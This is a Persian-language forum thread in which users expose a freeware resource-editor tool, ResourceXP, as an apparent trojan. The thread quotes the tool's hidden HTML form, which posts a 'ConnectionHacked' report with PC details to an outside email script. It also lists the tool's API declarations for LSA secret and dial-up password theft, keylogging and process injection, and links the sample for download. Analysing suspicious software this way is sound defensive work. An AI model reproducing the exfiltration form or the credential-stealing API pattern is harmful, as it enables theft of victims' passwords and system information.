ايران ويج

صفحه‌ها: 1 2

من هیچ شکی به دوستمون که برنامه برای ادیت کردن ریسورس فایل های اجرایی گذاشته بود ندارم ولی...

چرا یه فایل به اسم C:\sendhmtl.htm می سازه و توش می نویسه:

<FORM id=Compose name=Compose accept-charset=UTF8 action=http://www.tajrish.com/email.php method=post><<INPUT id= fromsize=40 value="@yahoo.com"name=from> <INPUT id=to size=40 value=wahid_15771@yahoo.com name=to>B<INPUT id=subject size=50 value="$ConnectionHacked!﷓" name=subject>H<INPUT id=messege name=Bodyvalue="
(WDIR: )(PCName: ) " size=120> ŒD<INPUT id=send type=submit value="SendE-Mail"name=send>
</form>

چرا Task Manager رو می بنده؟

چرا این توابع رو تو برنامت به کار گرفتی؟ چند تاش به درد ادیت کردن ریسورس می خوره ؟

Private Declare Sub RasGetConnectStatusA Lib "rasapi32.dll" ()

Private Declare Sub RasEnumConnectionsA Lib "rasapi32.dll" ()

Private Declare Sub LocalFree Lib "kernel32" ()

Private Declare Sub LocalAlloc Lib "kernel32" ()

Private Declare Sub GlobalFree Lib "kernel32" ()

Private Declare Sub RtlMoveMemory Lib "kernel32" ()

Private Declare Sub GetVersionExA Lib "kernel32" ()

Private Declare Sub SHGetSpecialFolderPathA Lib "shell32.dll" ()

Private Declare Sub GetPrivateProfileIntA Lib "kernel32" ()

Private Declare Sub LookupAccountNameA Lib "ADVAPI32.dll" ()

Private Declare Sub IsValidSid Lib "ADVAPI32.dll" ()

Private Declare Sub ConvertSidToStringSidA Lib "ADVAPI32.dll" ()

Private Declare Sub WideCharToMultiByte Lib "kernel32" ()

Private Declare Sub MultiByteToWideChar Lib "kernel32" ()

Private Declare Sub LsaFreeMemory Lib "ADVAPI32.dll" ()

Private Declare Sub LsaClose Lib "ADVAPI32.dll" ()

Private Declare Sub LsaRetrievePrivateData Lib "ADVAPI32.dll" ()

Private Declare Sub LsaOpenPolicy Lib "ADVAPI32.dll" ()

Private Declare Sub RasGetEntryPropertiesA Lib "rasapi32.dll" ()

Private Declare Sub RasGetEntryDialParamsA Lib "rasapi32.dll" ()

Private Declare Sub RasEnumEntriesA Lib "rasapi32.dll" ()

Private Declare Function GetForegroundWindow Lib "user32" () As Long

Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Private Declare Sub KillTimer Lib "user32" ()

Private Declare Sub GetCurrentProcessId Lib "kernel32" ()

Private Declare Sub RegisterServiceProcess Lib "kernel32" ()

Private Declare Sub SendMessageA Lib "user32" ()

Private Declare Sub CloseHandle Lib "kernel32" ()

Private Declare Sub VirtualFreeEx Lib "kernel32" ()

Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Sub GetWindowThreadProcessId Lib "user32" ()

Private Declare Sub OpenProcess Lib "kernel32" ()

Private Declare Sub WaitForSingleObject Lib "kernel32" ()

Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long

Private Declare Sub VirtualAllocEx Lib "kernel32" ()

Private Declare Sub FindWindowExA Lib "user32" ()

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Declare Sub GetAsyncKeyState Lib "user32" ()

Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long

Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Private Declare Sub GetUserNameA Lib "ADVAPI32.dll" ()

Private Declare Sub InitCommonControls Lib "comctl32.dll" ()

دوستان اگه به اینایی که گفتم شک دارین می تونین خودتون برنامه رو تست کنید
حتی با یه نت پد میشه نقشه این دوست تازه کارمون رو فهمید که حتی رشته هاشو انکریپت نکرده !!!
از این دوستمون می خوام یه توضیح کوچولو بده تا من از این شک بیخود در بیام البته که من به ایشون هیچ شکی ندارم و نمی خوام به هیچ کس تهمت زده بشه ولی برای اینکار لااقل یه جا میرفتی که توش پر از برنامه نویس نباشه...

كي و كدام برنامه ؟

Iron_Fist نوشته است:كي و كدام برنامه ؟

اسم آي ديش يادم نيست ولي
تو read me اينو نوشته بود

1384/12/09
--------------------------

salam,man in barnamaro ba visual Basic 6.0 (VB) neveshtam.
choon man khodam be ek hamchenin barnamey neyaz dashtam.
vaghti didam kasi in ro nadede majbor be sakhtesh shodam.
va in barnamaro be baroobache IRAN VIG taghdim mikoonam.

--------------------------

ABILITYS:
Search text to EXE file.
Search picture and Icon to EXE file.
convert visual basic file to them XP.
...

----------------------------

wahid zohani
wahid_15771@yahoo.com

اسم برنامه هم ResourceXP بود

آهان!

آي ديش jfc بود

http://www.iranvig.com/3226.html

سلام منم به برنامه این آقا شک کردم
چون بدون سورس بود و فقط فایل exe رو گذاشته بود
البته من اینجور فایل ها رو تو ماشین مجازی Microsoft Virtual PC یا VMware Workstation
امتحان میکنم و قبل از اجرا کردنش هم اون رو Decompiler میکنم متاسفانه تو Decompiler
دیدم که ایشون ... آره
فایلش رو هم براتون اتچ میکنم ببینینش چون از روی سایت پاک شده فکر کنم مدیریت پاکش کرده
http://rapidshare.de/files/14448215/ResourceXP.zip.html
شرمنده توی راپیدشیر آپلودش کردم
توی صفحه ظاهر شده از پایین دکمه Free رو بزنین یه تایمر 20 ثانیه ای میاد بعد از تایمر کد امنیتی رو وارد کنید و دکمه دانلود رو بزنید راستی توسط دانلودر خود ویندوز یا فایرفوکس دانلود میشه

ميشه بگين از چه Decompiler استفاده می کنید؟

veyskarami نوشته است:ميشه بگين از چه Decompiler استفاده می کنید؟

ببخشید دوست عزیز
من مدتی بود که به سایت سر نمی زدم
Decompiler من P32Dasm_v1.9 هستش
براتون اتچش کردم

من که آن لاین هیچ کدی رو.... نمی کنم

حالا اگه ويروس يا تروجان بوده با اون شخص برخورد ميشه؟

چرا که نه !

اعدامش کنيد!

صفحه‌ها: 1 2

rRezar

Iron_Fist

rRezar

rRezar

saber2005

veyskarami

saber2005

vblove

Payman62

Iron_Fist

rRezar